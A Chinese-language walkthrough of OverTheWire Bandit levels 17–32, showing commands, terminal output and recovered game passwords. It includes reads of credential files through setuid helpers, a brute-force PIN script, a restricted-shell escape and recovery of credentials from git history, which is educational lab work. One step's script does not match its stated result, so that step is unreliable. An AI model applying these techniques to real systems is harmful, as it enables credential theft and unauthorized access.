前言
OverTheWire是一个提供网络安全游戏的平台,其中Bandit是最受欢迎的系列之一。Bandit主要关注Linux系统基础知识,通过一系列逐步递进的任务,引导用户学习基本的命令行操作、文件管理、权限控制、脚本编写等技能
。这个游戏是针对初学者设计的,目的是帮助用户掌握基本的命令行操作和网络安全技能。
题目网址:https://overthewire.org/wargames/bandit/
一、靶场信息SSH information
host(主机):bandit.labs.overthewire.org
port(端口号):2220
用xshell可以连接但容易遇到小问题,建议直接使用kali linux进行闯关。
初始账号:bandit0
初始密码:bandit0(其余账号密码为32位字符串)
二、解题步骤及知识点
18.level17-level18
goal:There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new
在主目录中有 2 个文件:passwords.old 和 passwords.new。下一级的密码在 passwords.new 文件中,并且是 passwords.old 和 passwords.new 之间唯一发生变化的行。
NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19.
注意:如果你已经解决了这一级,并且在尝试登录 bandit18 时看到“Byebye!”的信息,这与下一级,bandit19 有关。
Tips:diff。
- 解题思路:
diff passwords.new passwords.old
截图如下:
bandit17@bandit:~$ ls
passwords.new passwords.old
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO #bandit18的密码
---
> ktfgBvpMzWKR5ENj26IbLGSblgUG9CzB
获得下一级账号bandit18的密码为:x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO。
ssh -p2220 bandit18@bandit.labs.overthewire.org #登录bandit18
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -p2220 bandit18@bandit.labs.overthewire.org
-[ More information ]--
For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/
For support, questions or comments, contact us on discord or IRC.
Enjoy your stay!
Byebye !
Connection to bandit.labs.overthewire.org closed.
19.level18-level19
goal:The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.
下一级的密码存储在主目录中的一个名为 readme 的文件里。不幸的是,有人修改了 .bashrc 文件,使得你在用 SSH 登录时会被自动登出。
- 知识点1:.bashrc 文件是 Bash shell 的配置文件,它在每次新的 Bash 会话开始时被执行。如果这个文件中包含了登出用户的命令,比如 exit 或 logout,那么每次你尝试登录时,你都会被立即登出。
- 解题思路:
- 直接后面接命令执行。
- 也可以直接开启另外一个bash交互。
ssh -p2220 bandit18@bandit.labs.overthewire.org 'cat ./readme'
截图如下:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -p2220 bandit18@bandit.labs.overthewire.org 'cat ./readme'
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit18@bandit.labs.overthewire.org's password:
cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8
===================================方法二============================
ssh -p2220 bandit18@bandit.labs.overthewire.org 'echo "Skipping .bashrc" && bash'
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit18@bandit.labs.overthewire.org's password:
Skipping .bashrc
ls
readme
cat ./readme
cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8
获得下一级账号bandit19的密码为:cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8。
ssh -p2220 bandit19@bandit.labs.overthewire.org #登录bandit19
20.level19-level20
goal:To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
为了进入下一级,你应该使用主目录中的 setuid 二进制文件。不带任何参数执行它,以了解如何使用它。在你使用了 setuid 二进制文件之后,可以在通常的地方(/etc/bandit_pass)找到这一级的密码。
- 解题思路:
./bandit20-do cat /etc/bandit_pass/bandit20
截图如下:
bandit19@bandit:~$ ls
bandit20-do
bandit19@bandit:~$ ./bandit20-do whoami
bandit20
bandit19@bandit:~$ ls /etc/bandit_pass/
bandit0 bandit11 bandit14 bandit17 bandit2 bandit22 bandit25 bandit28 bandit30 bandit33 bandit6 bandit9
bandit1 bandit12 bandit15 bandit18 bandit20 bandit23 bandit26 bandit29 bandit31 bandit4 bandit7
bandit10 bandit13 bandit16 bandit19 bandit21 bandit24 bandit27 bandit3 bandit32 bandit5 bandit8
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
获得下一级账号bandit20的密码为:0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO。
ssh -p2220 bandit20@bandit.labs.overthewire.org #登录bandit20
21.level20-level21
goal:To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
在主目录中有一个设置了 setuid 的二进制文件,它的功能如下:它根据你作为命令行参数指定的端口号连接到本地主机。然后它从连接中读取一行文本,并将其与上一级(bandit20)的密码进行比较。如果密码正确,它将传输下一级(bandit21)的密码。
- 解题思路:
nc -lvp 2333 < /etc/bandit_pass/bandit20 & # &表示后台执行
./suconnect 2333
截图如下:
bandit20@bandit:~$ ls
suconnect
bandit20@bandit:~$ nc -lvp 2333 < /etc/bandit_pass/bandit20 &
[2] 858814
bandit20@bandit:~$ Listening on 0.0.0.0 2333
./suconnect 2333
Connection received on localhost 49826
Read: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
Password matches, sending next password
EeoULMCra2q0dSkYj561DX7s1CpBuOBt #bandit21密码
[2]+ Done nc -lvp 2333 < /etc/bandit_pass/bandit20
获得下一级账号bandit21的密码为:EeoULMCra2q0dSkYj561DX7s1CpBuOBt。
ssh -p2220 bandit21@bandit.labs.overthewire.org #登录bandit21
22.level21-level22
goal:A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
一个程序正在通过 cron(基于时间的任务调度器)定期自动运行。查看 /etc/cron.d/ 目录下的配置,看看正在执行什么命令。
- 解题思路:
截图如下:
bandit21@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 e2scrub_all otw-tmp-dir sysstat
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q # bandit22密码
获得下一级账号bandit22的密码为:tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q。
ssh -p2220 bandit22@bandit.labs.overthewire.org #登录bandit22
23.level22-level23
goal:A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
一个程序正在通过 cron(基于时间的任务调度器)定期自动运行。查看 /etc/cron.d/ 目录下的配置,看看正在执行什么命令。
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints…
注意:阅读别人编写的 shell 脚本是一个非常有用的技能。这一级的脚本故意写得容易阅读。如果你在理解它的作用时遇到困难,尝试执行它,看看它打印的调试信息。
- 解题思路:查看脚本,修改myname=bandit23
截图如下:
bandit22@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 e2scrub_all otw-tmp-dir sysstat
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ sh /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@bandit:~$ cp /usr/bin/cronjob_bandit23.sh /tmp/bandit_pass
bandit22@bandit:/tmp$ vim /tmp/bandit_pass # **修改myname=bandit23**
bandit22@bandit:/tmp$ sh /tmp/bandit_pass
Copying passwordfile /etc/bandit_pass/bandit23 to /tmp/8ca319486bfbbc3663ea0fbe81326349
/tmp/bandit_pass: 8: cannot create /tmp/8ca319486bfbbc3663ea0fbe81326349: Permission denied
bandit22@bandit:/tmp$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
0Zf11ioIjMVN551jX3CmStKLYqjk54Ga #bandit23密码
bandit22@bandit:/tmp$
获得下一级账号bandit23的密码为:0Zf11ioIjMVN551jX3CmStKLYqjk54Ga。
ssh -p2220 bandit23@bandit.labs.overthewire.org #登录bandit23
24.level23-level24
goal:A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
一个程序正在通过 cron(基于时间的任务调度器)定期自动运行。查看 /etc/cron.d/ 目录下的配置,看看正在执行什么命令。
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
注意:这一级需要你创建你自己的第一个 shell 脚本。这是一个非常重要的步骤,当你完成这一级时,你应该为自己感到骄傲!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
第二个注意:请记住,你的 shell 脚本在执行后会被删除,所以你可能想要保留一份副本……
- 解题思路:
使用 whoami 命令获取当前用户的用户名,并将其存储在变量 myname 中。
将工作目录更改为 /var/spool/$myname/foo,这里 $myname 是之前获取的用户名,所以它会进入一个特定于当前用户的目录。
打印一条消息,表明它将执行并删除 /var/spool/$myname/foo 目录中的所有脚本。
使用 for 循环遍历该目录中的所有文件和目录。
对于每个文件或目录 i,如果它不是当前目录(.)或父目录(…),则执行以下操作:
打印出正在处理的文件名 $i。
使用 stat 命令获取文件的所有者,并将其存储在变量 owner 中。
如果文件的所有者是 bandit23,则使用 timeout 命令执行该脚本,最多允许 60 秒的执行时间,如果脚本在这段时间内没有完成,则会发送信号 9(默认是 SIGKILL)来终止它。
执行完毕后,使用 rm -f 命令删除该脚本文件。
=============================
cd /var/spool/bandit24/foo/ # 切换到该目录下,写个脚本
vim ./get_pass.sh # 新建脚本所有者为bandit23该脚本会被自动删除,脚本内容如下:
cat /usr/bin/cronjob_bandit24.sh > /tmp/bandit24_pass #直接查看 /tmp/bandit24_pass
=============================
截图如下:
bandit23@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit24 otw-tmp-dir
cronjob_bandit23 e2scrub_all sysstat
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
bandit23@bandit:~$ cd /var/spool/bandit24/foo/
bandit23@bandit:/var/spool/bandit24/foo$ vim ./get_pass.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/bandit24_pass
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 ##bandit24密码
bandit23@bandit:/var/spool/bandit24/foo$ cat ./get_pass.sh
cat: ./get_pass.sh: No such file or directory
vim ./get_pass.sh #脚本内容如图 记得cd /var/spool/bandit24/foo/
#!/bin/bash
cat /usr/bin/cronjob_bandit24.sh > /tmp/bandit24_pass
获得下一级账号bandit24的密码为:gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8。
ssh -p2220 bandit24@bandit.labs.overthewire.org #登录bandit24
25.level24-level25
goal:A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.You do not need to create new connections each time.
为了解决这个挑战,你需要对密码进行暴力破解。由于它是一个4位数字的密码,有10,000种可能的组合(从0000到9999)。你可以编写一个脚本来自动化这个过程,通过连接到守护进程并尝试每种组合以及bandit24的密码。
- 解题思路:暴力破解,vim /tmp/brute_force/get_pass.sh,创建脚本运行,分成10组跑的快点,password是bandit24的密码,脚本内容如下图
截图如下:
#!/bin/bash
password="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
# 定义每组的开始和结束pin码
declare -a start_pins=(0000 1000 2000 3000 4000 5000 6000 7000 8000 9000)
declare -a end_pins=(0999 1999 2999 3999 4999 5999 6999 7999 8999 9999)
# 定义一个函数来执行暴力破解
brute_force_range() {
local start=$1
local end=$2
for pin in $(seq -w $start $end); do
echo "Trying pin: $pin"
# Capture the response from the daemon
response=$(echo "$password $pin" | nc -q 1 localhost 30002)
# Print the response to see it in the output
echo "$response"
# If the response is not the wrong password message, stop all brute force processes
if [[ "$response" != *"Wrong"* ]]; then
echo "Correct pin found: $pin"
kill -- -$$
return
fi
done
}
# 使用wait命令等待所有后台进程
trap 'wait' EXIT
# 启动10个后台进程
for i in ${!start_pins[@]}; do
brute_force_range ${start_pins[$i]} ${end_pins[$i]} &
done
# 等待所有后台进程完成
wait
echo "All brute force attempts completed."
运行脚本bash /tmp/brute_force/get_pass.sh
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password and pincode. Try again.
Trying pin: 7298
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password and pincode. Try again.
Trying pin: 6299
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
**Correct pin found: 9297**
Terminated
bandit24@bandit:/tmp/brute_force$
bandit24@bandit:/tmp/brute_force$ echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 9297" | nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
获得下一级账号bandit25的PIN为:9297
获得下一级账号bandit25的密码为:iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
ssh -p2220 bandit25@bandit.labs.overthewire.org #登录bandit25
26.level25-level26
goal:Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
登录到 bandit26 从 bandit25 应该相当容易…… 用户 bandit26 的 shell 不是 /bin/bash,而是别的。找出它是什么,它如何工作,以及如何从中突破。
- 解题思路:
grep bandit26 /etc/passwd #了解bandit26的shell类型
- 发现/usr/bin/showtext 查看发现脚本会执行exit 0 退出
- 拉小窗口使用more命令 按v 视图模式,再输入:可以执行bash命令
- e /etc/bandit_pass/bandit26 # e 可以将文本导入文件
截图如下:
bandit25@bandit:~$ grep bandit26 /etc/passwd
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
exec more ~/text.txt
exit 0
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost -p2220
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
--More--(66%)
#记得缩小窗口,按V 进入试图模式,再按冒号:可以输入命令
:e /etc/bandit_pass/bandit26
s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
~
~
~
"/etc/bandit_pass/bandit26" [readonly] 1L, 33B
获得下一级账号bandit25的密码为:s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
ssh -p2220 bandit26@bandit.labs.overthewire.org #登录bandit26 一样会自动退出
27.level26-level27
goal:Good job getting a shell! Now hurry and grab the password for bandit27!
干得好,获得了 shell!现在快去获取 bandit27 的密码!
- 解题思路:在上题中more命令下,按V 按:可以输入命令
- 先设置一下新的shell :set shell=/bin/bash
- 运行shell ,:shell就可以进入bandit26
截图如下:
:set shell=/bin/bash
:shell
[No write since last change]
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB
获得下一级账号bandit27的密码为:upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB
ssh -p2220 bandit27@bandit.labs.overthewire.org #登录bandit27
28.level27-level28
goal:There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo via the port 2220. The password for the user bandit27-git is the same as for the user bandit27.Clone the repository and find the password for the next level.
在 ssh://bandit27-git@localhost/home/bandit27-git/repo
有一个 git 仓库,通过端口 2220 访问。用户 bandit27-git
的密码与用户 bandit27
的密码相同。克隆仓库并找到下一级的密码。
- 解题思路:
截图如下:
bandit27@bandit:mkdir /tmp/git-dir
bandit27@bandit:cd /tmp/git-dir
bandit27@bandit:/tmp/git-dir$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit27/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit27-git@localhost's password:
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/git-dir$ ls
repo
bandit27@bandit:/tmp/git-dir$ ls repo/
README
bandit27@bandit:/tmp/git-dir$ cat repo/README
The password to the next level is: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN
获得下一级账号bandit28的密码为:Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN
ssh -p2220 bandit28@bandit.labs.overthewire.org #登录bandit28
29.level28-level29
goal:There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo via the port 2220. The password for the user bandit28-git is the same as for the user bandit28.
有一个 git 仓库位于通过端口 2220 访问的 ssh://bandit28-git@localhost/home/bandit28-git/repo
。用户 bandit28-git
的密码与用户 bandit28
的密码相同。
- 解题思路:git log 查看日志信息(发现有修复信息泄露漏洞)
- git checkout 切换分支(切换到信息泄露前的分支,查看密码。)
截图如下:
bandit28@bandit:/tmp$ mkdir /tmp/git-dir28
bandit28@bandit:/tmp$ cd /tmp/git-dir28
bandit28@bandit:/tmp/git-dir28$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit28/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit28-git@localhost's password:
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/git-dir28$ ls
repo
bandit28@bandit:/tmp/git-dir28$ cat repo/
cat: repo/: Is a directory
bandit28@bandit:/tmp/git-dir28$ ls ./repo/
README.md
bandit28@bandit:/tmp/git-dir28$ cat ./repo/README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: xxxxxxxxxx
==========
bandit28@bandit:/tmp/git-dir28$ cd repo/
bandit28@bandit:/tmp/git-dir28/repo$ git log
commit 817e303aa6c2b207ea043c7bba1bb7575dc4ea73 (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date: Thu Sep 19 07:08:39 2024 +0000
fix info leak
commit 3621de89d8eac9d3b64302bfb2dc67e9a566decd
Author: Morla Porla <morla@overthewire.org>
Date: Thu Sep 19 07:08:39 2024 +0000
add missing data
commit 0622b73250502618babac3d174724bb303c32182
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:39 2024 +0000
initial commit of README.md
bandit28@bandit:/tmp/git-dir28/repo$ git checkout 3621de89d8eac9d3b64302bfb2dc67e9a566decd
Note: switching to '3621de89d8eac9d3b64302bfb2dc67e9a566decd'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 3621de8 add missing data
bandit28@bandit:/tmp/git-dir28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
获得下一级账号bandit29的密码为:4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
ssh -p2220 bandit29@bandit.labs.overthewire.org #登录bandit29
30.level29-level30
goal:There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo via the port 2220. The password for the user bandit29-git is the same as for the user bandit29.Clone the repository and find the password for the next level.
在通过端口 2220 访问的 ssh://bandit29-git@localhost/home/bandit29-git/repo
有一个 git 仓库。用户 bandit29-git
的密码与用户 bandit29
的密码相同。克隆该仓库并找到下一级的密码。
- 解题思路:省略前面部分直接git clone查看
- git checkout 切换分支
- git branch -a
- git log
- bandit29@bandit:~$ mkdir /tmp/git-dir29
bandit29@bandit:~$ cd /tmp/git-dir29
bandit29@bandit:/tmp/git-dir29$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
截图如下:
bandit29@bandit:/tmp/git-dir29$ cat repo/README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: <no passwords in production!>
bandit29@bandit:/tmp/git-dir29/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev
bandit29@bandit:/tmp/git-dir29/repo$ git log
commit 6ac7796430c0f39290a0e29a4d32e5126544b022 (HEAD -> master, origin/master, origin/HEAD)
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
fix username
commit e65a928cca4db1863b478cf5e93d1d5b1c1bd6b2
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
initial commit of README.md
bandit29@bandit:/tmp/git-dir29/repo$ git checkout remotes/origin/dev
Note: switching to 'remotes/origin/dev'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 081ac38 add data needed for development
bandit29@bandit:/tmp/git-dir29/repo$ git log
commit 081ac380883f49b0d9dc76a82c53211ef7ba74b0 (HEAD, origin/dev)
Author: Morla Porla <morla@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
add data needed for development
commit 03aa12c85ea4c1ea170b8e5fe80e55de7853b4db
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
add gif2ascii
commit 6ac7796430c0f39290a0e29a4d32e5126544b022 (origin/master, origin/HEAD, master)
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
fix username
commit e65a928cca4db1863b478cf5e93d1d5b1c1bd6b2
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
initial commit of README.md
(END)
commit 03aa12c85ea4c1ea170b8e5fe80e55de7853b4db
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
add gif2ascii
commit 6ac7796430c0f39290a0e29a4d32e5126544b022 (origin/master, origin/HEAD, master)
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
fix username
commit e65a928cca4db1863b478cf5e93d1d5b1c1bd6b2
Author: Ben Dover <noone@overthewire.org>
Date: Thu Sep 19 07:08:41 2024 +0000
initial commit of README.md
bandit29@bandit:/tmp/git-dir29/repo$ git checkout 081ac380883f49b0d9dc76a82c53211ef7ba74b0
HEAD is now at 081ac38 add data needed for development
bandit29@bandit:/tmp/git-dir29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
获得下一级账号bandit30的密码为:qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
ssh -p2220 bandit30@bandit.labs.overthewire.org #登录bandit30
31.level30-level31
goal:There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo via the port 2220. The password for the user bandit30-git is the same as for the user bandit30.Clone the repository and find the password for the next level.
在通过端口 2220 访问的 ssh://bandit30-git@localhost/home/bandit30-git/repo
有一个 git 仓库。用户 bandit30-git
的密码与用户 bandit30
的密码相同。克隆该仓库并找到下一级的密码。
- 解题思路:省略前面部分直接git clone查看
- git tag
- git show secret
截图如下:
bandit30@bandit:/tmp/git-dir30$ ls
repo
bandit30@bandit:/tmp/git-dir30$ cat repo/README.md
just an epmty file... muahaha
bandit30@bandit:/tmp/git-dir30$ cd repo/
bandit30@bandit:/tmp/git-dir30/repo$ git tag
secret
bandit30@bandit:/tmp/git-dir30/repo$ git show secret
fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy
获得下一级账号bandit31的密码为:fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy
ssh -p2220 bandit31@bandit.labs.overthewire.org #登录bandit31
32.level31-level32
goal:There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo via the port 2220. The password for the user bandit31-git is the same as for the user bandit31.Clone the repository and find the password for the next level.
在通过端口 2220 访问的 ssh://bandit31-git@localhost/home/bandit31-git/repo
有一个 git 仓库。用户 bandit31-git
的密码与用户 bandit31
的密码相同。克隆该仓库并找到下一级的密码。
- 解题思路:省略前面部分直接git clone查看
- git add -f key.txt
- git commit -m “Add key.txt”
- git push -u origin master
截图如下:
bandit31@bandit:/tmp/git-dir31$ cat repo/README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/git-dir31$ cd repo/
bandit31@bandit:/tmp/git-dir31/repo$ echo 'May I come in?' > key.txt
bandit31@bandit:/tmp/git-dir31/repo$ git add -f key.txt
bandit31@bandit:/tmp/git-dir31/repo$ git commit -m "Add key.txt"
[master 9708629] Add key.txt
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/git-dir31/repo$ git push -u origin master
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit31/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 2 threads
Compressing objects: 100% (2/2), done.
